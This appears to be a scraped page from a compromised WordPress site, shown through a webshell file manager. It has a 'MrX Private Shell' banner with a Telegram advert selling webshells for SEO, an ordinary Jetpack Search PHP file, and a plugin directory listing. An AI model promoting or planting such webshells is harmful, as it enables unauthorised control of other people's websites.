__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
/**
* Jetpack compatibility
*
* @package automattic/jetpack-search
*/
namespace Automattic\Jetpack\Search\Compatibility\Jetpack;
use Jetpack;
/**
* Override the condition to show Search submenu when Jetpack plugin exists.
*/
function should_show_jetpack_search_submenu() {
if ( ! current_user_can( 'manage_options' ) ) {
return false;
}
// If site is in Offline Mode or not connected yet.
if ( ! Jetpack::is_active_and_not_offline_mode() ) {
return false;
}
return true;
}
add_filter( 'jetpack_search_should_add_search_submenu', __NAMESPACE__ . '\should_show_jetpack_search_submenu' );
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| jetpack.php | File | 614 B | 0644 |
|
| search-0.15.2.php | File | 1 KB | 0644 |
|
| search-0.17.0.php | File | 701 B | 0644 |
|
| unsupported-browsers.php | File | 1.29 KB | 0644 |
|